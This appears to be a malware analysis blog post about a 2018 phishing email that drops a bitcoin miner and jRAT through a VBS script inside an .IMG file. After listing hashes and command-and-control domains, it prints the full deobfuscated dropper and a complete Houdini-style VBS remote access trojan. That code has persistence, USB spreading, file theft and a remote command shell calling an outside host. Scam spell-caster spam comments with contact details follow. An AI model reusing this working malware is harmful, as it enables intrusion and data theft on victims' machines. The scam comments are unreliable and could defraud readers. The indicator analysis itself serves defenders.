phishing email drops a bitcoin miner and jrat out of a .IMG file with a .VBS inside
X-Env-Sender: dbittnerf@gmail.com
x-originating-ip: [162.144.196.83]
Received: from server.ineli-mena.org (HELO server.ineli-mena.org)
From: "Purchase Assistance" <dbittnerf@gmail.com>
Subject: RE: B&G EQUIPMENT PO# 102571
Date: Mon, 5 Nov 2018
x-originating-ip: [162.144.196.83]
Received: from server.ineli-mena.org (HELO server.ineli-mena.org)
From: "Purchase Assistance" <dbittnerf@gmail.com>
Subject: RE: B&G EQUIPMENT PO# 102571
Date: Mon, 5 Nov 2018
-------------
more details here
and also pasted below
---------------
#phishing email drops a bitcoin miner and jrat out of a .IMG file with a .VBS inside
more info @neonprimetime
https://neonprimetime.blogspot.com/2018/11/jrat-and-bitcoin-miner-from-img-vbs-phish.html
------
VT links
------
https://www.virustotal.com/#/file/f2bd54981d86e7d475164ca5725090232dc1efd5251c42b58292d8b51e506aa2/community
https://www.virustotal.com/#/file/370784be22039af009a0b4e7915e36c4899133ac3afbb659cbbbec03dc9a2c6e/community
https://www.virustotal.com/#/file/07e13a645058b0f0afe4e79a34abf08dbead97c50b41cb9593035af13250e0f1/community
https://www.virustotal.com/#/file/b0cf01550e576a21ff62f1c34dbe202b14b73b0465cdf7558c445f09eee3a6c1/community
https://www.virustotal.com/#/file/5dcd1a584e27f75870b2c95aac56523927377d8c693fe6fc8a3f422cac79cadc/community
https://www.virustotal.com/#/file/77ecb4b190368eacf09103247fdd75c0c30a6b3c3340acb3d15df7747178cabc/community
----
app anyrun
----
https://app.any.run/tasks/77449da4-d60e-4c45-922c-b4a85c7ef814
-----
dns
-----
welcomehome.duckdns.org [173.46.85.98]
fud.fudcrypt.com
----
md5 hashes
----
f3a99bcd752bff6a15154484c94cdc21
f3c67b1a2631fde05b24ab26ce5bf6ea
b93df40c82b94680218ea964b5ce6808 ( THOR APT scanner says #magickitten #jrat #MiddleEasternThreatGroups )
11d828c9301a36749174b1e0459cba55
d859b188405930541aea64ad22f8cf92
7443f9ecbd050b1e7eae529983543b05
------
email headers
------
X-Env-Sender: dbittnerf@gmail.com
x-originating-ip: [162.144.196.83]
Received: from server.ineli-mena.org (HELO server.ineli-mena.org)
From: "Purchase Assistance" <dbittnerf@gmail.com>
Subject: RE: B&G EQUIPMENT PO# 102571
Date: Mon, 5 Nov 2018
---------------
vbscript
---------------
Set noun = CreateObject("ADODB.Stream")
Private Function hen(water, omo, alafia)
If omo = 4 Then
noun.Type = 1
noun.Open
noun.Write water
noun.Position = 0
noun.Type = 2
noun.CharSet = "us-ascii"
hen = noun.ReadText
End If
End Function
Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
ms_pmt_dfa.DataType = "bin.base64"
ms_pmt_dfa.Text = kili
bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
End Function
Private Sub table(chair, milo, sound, clef, sule, naira)
For i = 0 To 0
ExecuteGlobal naira
Next
End Sub
Private Function linen(stove, gard, radio, ladela)
Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
m_u_t_e_x = "#("
the_const = "m"
m_a_i_n = "[REMOVED]"
pau_sed = ""
If radio = 0 Then
pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
Else
'table "7", False, 10, ladela, Nothing, 10
linen = ladela
End If
End Function
Dim kilimanjaro
kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
table "2", Nothing, False, True, 0, kilimanjaro
Set noun = Nothing
---------------
decoded binary
---------------
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim longText1
longText1 = "[REMOVED]"
Set wshShell1 = CreateObject("WScript.Shell")
Dim appdatadir1, stubpath1
appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%")
stubpath1 = appdatadir1 & "\VRMedabkRb.vbs"
Dim decoded1
decoded1 = decodeBase64(longText1)
writeBytes stubpath1, decoded1
wshShell1.Run("""" & stubpath1 & """")
Set wshShell1 = Nothing
Dim longText
longText = "[REMOVED]"
longText = Replace(longText, "#(", "A")
Set wshShell = CreateObject( "WScript.Shell" )
Dim tempdir, appdatadir, text, stubpath
tempdir = wshShell.ExpandEnvironmentStrings("%temp%")
appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%")
stubpath = appdatadir & "\ntfsmgr.jar"
Dim decoded
decoded = decodeBase64(longText)
writeBytes stubpath, decoded
Set fso = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\CurrentVersion")
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
If text = "" Then
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion")
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
If text <> "" Then
text = text & "\bin\javaw.exe"
End If
Else
text = text & "\bin\javaw.exe"
End If
If InStr(text, "jre") > 0 Then
Dim validJrePath
validJrePath = getValidJre(text)
If InStr(validJrePath, "javaw.exe") > 0 Then
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & validJrePath & """ -jar """ & stubpath & """", "REG_SZ"
wshShell.Run("""" & validJrePath & """" & " -jar " & """" & stubpath & """")
Else
GrabJreFromNet()
End If
Else
GrabJreFromNet()
End If
Private Sub GrabJreFromNet()
Dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.thegoldfingerinc.com/images/jre.zip", False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile appdatadir & "\jre.zip", 2
end with
UnZip appdatadir & "\jre.zip", appdatadir & "\jre7"
wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion", "1.7", "REG_SZ"
wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\1.7\JavaHome", appdatadir & "\jre7", "REG_SZ"
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """", "REG_SZ"
wshShell.Run("""" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """")
End Sub
Private Function decodeBase64(base64)
Dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
EL.Text = base64
decodeBase64 = EL.NodeTypedValue
End Function
Private Sub writeBytes(file, bytes)
Dim binaryStream
Set binaryStream = CreateObject("ADODB.Stream")
binaryStream.Type = TypeBinary
binaryStream.Open
binaryStream.Write bytes
binaryStream.SaveToFile file, ForWriting
End Sub
Sub UnZip(zipfile, ExtractTo)
if fso.GetExtensionName(zipfile) = "zip" then
If NOT fso.FolderExists(ExtractTo) Then
fso.CreateFolder(ExtractTo)
End If
set objShell = CreateObject("Shell.Application")
set destination = objShell.NameSpace(ExtractTo)
set zip_content = objShell.NameSpace(zipfile).Items
for i = 0 to zip_content.count - 1
if (fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))) then
fso.DeleteFile(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))
end if
destination.copyHere zip_content.item(i), 20
next
End if
End Sub
Function getValidJre(res)
a = Split(res, vbCrLf)
for each x in a
if InStr(x, "javaw.exe") > 0 Then
Return = wshShell.Run("cmd /c " & """" & x & """" & " -version 2> %temp%\output.txt", 0, true)
Set file = fso.OpenTextFile(tempdir & "\output.txt", 1)
text = file.ReadAll
file.Close
If InStr(text, "1.6") > 0 Or InStr(text, "1.7") > 0 Or InStr(text, "1.8") > 0 Then
getValidJre = x
Exit Function
End If
End If
next
End Function
Set wshShell = Nothing
------
nested vbscript
------
Set noun = CreateObject("ADODB.Stream")
Private Function hen(water, omo, alafia)
If omo = 4 Then
noun.Type = 1
noun.Open
noun.Write water
noun.Position = 0
noun.Type = 2
noun.CharSet = "us-ascii"
hen = noun.ReadText
End If
End Function
Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
ms_pmt_dfa.DataType = "bin.base64"
ms_pmt_dfa.Text = kili
bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
End Function
Private Sub table(chair, milo, sound, clef, sule, naira)
For i = 0 To 0
ExecuteGlobal naira
Next
End Sub
Private Function linen(stove, gard, radio, ladela)
Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
m_u_t_e_x = "#("
the_const = "A"
m_a_i_n = "[REMOVED]"
pau_sed = ""
If radio = 0 Then
pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
Else
'table "7", False, 10, ladela, Nothing, 10
linen = ladela
End If
End Function
Dim kilimanjaro
kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
table "2", Nothing, False, True, 0, kilimanjaro
Set noun = Nothing
-----
3rd nested script decoded
-----
'<[ recoder : houdini (c) skype : houdini-fx ]>
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'host = "pm2bitcoin.com"
'port = 3175
host = "fud.fudcrypt.com"
port = 7755
installdir = "%appdata%"
lnkfile = true
lnkfolder = true
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce
'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next
instance
while true
install
response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select
wscript.sleep sleep
wend
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon
upstart
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
if filesystemobj.fileexists (drive.path & "\" & installname) then
filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
if not lnkfile then exit for
if instr (file.name,".") then
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
sub uninstall
on error resume next
dim filename
dim foldername
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
function post (cmd ,param)
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
end sub
function hwid
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function
function security
on error resume next
security = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function
function instance
on error resume next
usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
end if
end If
upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function
sub sitedownloader (fileurl,filename)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send
set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
sub download (fileurl,filedir)
if filedir = "" then
filedir = installdir
end if
strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
function upload (fileurl)
dim httpobj,objstreamuploade,buffer
set objstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
function enumdriver ()
for each drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
function enumfaf (enumdir)
enumfaf = enumdir & spliter
for each folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next
for each file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
next
end function
function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub
function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function
This is a testimony that I will tell everyone to hear. i have been married four 4 years and on the fifth year of my marriage, another woman had a spell to take my lover away from me and my husband left me and the kids and we have suffered for 2 years until i meant a post where this man Dr, kuta have helped someone and i decided to give him a try to help me bring my love Husband home and believe me i just send my picture to him and that of my husband and after 48 hours as he have told me, i saw a car drove into the house and behold it was my husband and he have come to me and the kids and that is why i am happy to make every one of you in similar to met with this man and have your lover back to your self His email: drkutaherbalcenter@gmail.com you can also contact him or whatspp him on this +2347054547814 thank so much
ReplyDeleteAll thanks to the great Priest Dr bow for helping me restore back my marriage when i taught all hope was lost.,this Priest helped me, and my relationship is now perfect. Contact for any spiritual work (@Drbowsolutionhome1) Your partner will definitely love you email him Drbowsolutionhome@gmail.com or whatapp him +2348121786772
ReplyDeleteHow I Got My Ex Husband Back..Am so excited to share my testimony of a real spell caster who brought my husband back to me. My husband and I have been married for about 6 years now. We were happily married with two kids, a boy and a girl. 3 months ago, I started to notice some strange behavior from him and a few weeks later I found out that my husband is seeing someone else. He started coming home late from work, he hardly care about me or the kids anymore, Sometimes he goes out and doesn't even come back home for about 2-3 days. I did all I could to rectify this problem but all to no avail. I became very worried and needed help. As I was browsing through the internet one day, I came across a website that suggested that Dr Aluya can help solve marital problems, restore broken relationships and so on. So, I felt I should give him a try. I contacted him and and told him my problems and he told me what to do and i did it and he did a spell for me. 48 hours later, my husband came to me and apologized for the wrongs he did and promise never to do it again. Ever since then, everything has returned back to normal. I and my family are living together happily again.. All thanks to Dr Aluya Powerful Love Spell that really works. If you have any problem contact him and i guarantee you that he will help you. He will not disappoint you. Email him at: aluya.48hoursspelltemple@gmail.com. or whatsapp him on: +2348110493039
ReplyDeleteSPELLS THAT WORKS I am sharing this testimony to partners suffering in their relationships LOVE because there is an enduring solution.
ReplyDeleteMy husband left me and our 2 kids for another woman for 3 years. I tried to be strong just for my kids but I could not control the pains that torment my heart. I was hurt and confused. I needed a help, so i did a research on the internet and came across a site where I saw that Dr. Aluya a spell caster, can help get lovers back. I contacted him and he did a special prayer and spells for me. To my surprises, after some days, my husband came back home. That was how we reunited again and there was a lot of love, joy and peace in the family.
You can as well contact Dr. Aluya , a powerful spell-caster for solutions on his contact aluya.48hoursspelltemple@gmail.com or directly on Whats App: +2348110493039